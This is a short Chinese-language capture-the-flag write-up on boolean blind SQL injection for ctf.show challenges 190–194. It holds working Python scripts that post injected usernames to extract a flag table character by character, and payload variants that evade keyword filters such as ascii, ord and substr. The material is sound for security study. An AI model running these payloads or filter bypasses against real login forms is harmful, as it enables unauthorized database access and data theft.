布尔盲注web入门190-194
基础脚本
import requests
url = 'http://9980403b-660a-4aa7-90a0-c791e0e00ca6.challenge.ctf.show/api/index.php'
result = ''
i = 0
while True:
i = i + 1
low = 32
high = 127
while low < high:
mid = (low + high) // 2
data = {
"username": f"admin' and if(ascii(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
"password": "1"
}
r = requests.post(url, data=data).text
if '\\u5bc6\\u7801\\u9519\\u8bef' in r:
low = mid + 1
else:
high = mid
if low != 32:
result += chr(low)
else:
break
print(result)
过滤1:
if(preg_match('/file|into|ascii/i', $username)){
绕过姿势:使用ord代替ascii
data = {
"username": f"admin' and if(ord(substr((select group_concat(f1ag)from ctfshow_fl0g),{i},1))>{mid},1,0)#",
"password": "1"
}
过滤2:
if(preg_match('/file|into|ascii|ord|hex/i', $username)){
绕过姿势:使用字典直接对比是否正确
import requests
url = "http://128f6cc0-3428-4086-8f43-384bac13bae8.challenge.ctf.show/api/index.php"
out = ''
dic = '{-}0123456789abcdefghijklmnopqrstuvwxyz'
for j in range(1, 50):
for k in dic:
data = {
'username': f"0'||if(substr((select group_concat(f1ag)from ctfshow_fl0g),{j},1)='{k}',1,0)#",
'password': '1'
}
re = requests.post(url, data=data)
if("\\u5bc6\\u7801\\u9519\\u8bef" in re.text):
out += k
print(out)
break
这种方式前两种也可以直接出来,但是会慢一点
过滤3:
if(preg_match('/file|into|ascii|ord|hex|substr/i', $username)){
绕过姿势:使用 mid 代替新增过滤 substr,也可以用left和right
data = {
'username': f"0'||if(mid((select group_concat(f1ag)from ctfshow_flxg),{j},1)='{k}',1,0)#",
'password': '1'
}
这里的库名改了
过滤4:
if(preg_match('/file|into|ascii|ord|hex|substr|char|left|right|substring/i', $username)){
绕过姿势:lpad 和 rpad 也可以和上一个一样用mid